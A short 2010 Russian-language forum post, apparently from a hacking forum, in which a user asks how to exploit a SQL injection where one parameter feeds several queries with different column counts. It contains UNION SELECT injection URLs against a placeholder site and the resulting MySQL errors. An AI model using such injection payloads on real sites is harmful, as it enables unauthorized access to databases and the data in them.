26.04.2010, 19:17
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
Есть иньекция, но в интересных условиях.
В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное.
Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца.
PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+
PHP код:
MySQL error occured on line 68 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query2..]
PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+
PHP код:
MySQL error occured on line 21 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query1..]
Any ideas?
Последний раз редактировалось Nek1t; 26.04.2010 в 19:25..
|
|
|